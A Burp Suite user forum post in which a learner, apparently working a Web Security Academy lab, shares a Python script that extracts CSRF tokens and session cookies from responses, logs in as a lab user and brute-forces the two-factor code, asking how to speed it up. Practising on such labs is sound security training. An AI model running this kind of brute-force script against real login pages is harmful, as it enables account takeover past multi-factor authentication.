Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

how to get values in responses such as set cookie session and csrf and use them as an attack

Muhammad | Last updated: Oct 17, 2024 10:50AM UTC

hihow to get values in responses such as set cookie session and csrf and use them as an attack ``` import requests from bs4 import BeautifulSoup import time, random sess = requests.Session() payloads = ["{:04}".format(i) for i in range(10)] random.shuffle(payloads) headers = {"Sec-Ch-Ua": "\"Chromium\";v=\"129\", \"Not=A?Brand\";v=\"8\"", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"Linux\"", "Accept-Language": "en-US,en;q=0.9", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate, br", "Priority": "u=0, i"} # get session token and csrf login_url = "https://0af000b503b4e77b80be44a1006200e9.web-security-academy.net/login" for mfa in payloads: res = sess.get(login_url) csrf = BeautifulSoup(res.text, 'lxml').find("input", {"name": "csrf"}).attrs['value'] session = res.headers['Set-Cookie'].split("=")[1].split(';')[0] # log it in that session res = sess.post(login_url, cookies={"session": session}, headers=headers, data={"username": "carlos", "password": "montoya", "csrf": csrf}, allow_redirects=False) validsession = res.headers['Set-Cookie'].split("=")[1].split(';')[0] res = sess.get(login_url+'2', cookies={"session": validsession}, headers=headers) mfacsrf = BeautifulSoup(res.text, 'lxml').find("input", {"name": "csrf"}).attrs['value'] # fuzz the mfacode res = sess.post(login_url+'2', cookies={"session": validsession}, headers=headers, data={"csrf": mfacsrf, "mfa-code": mfa}) print("Incorrect security code" in res.text) ``` this is the codei n python for the exploit but it is slow, 1 request in 2.2 seconds and i wanna do 10k but i see no doc specifying how to use the reponce values headers or html please any help would be a blessing

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.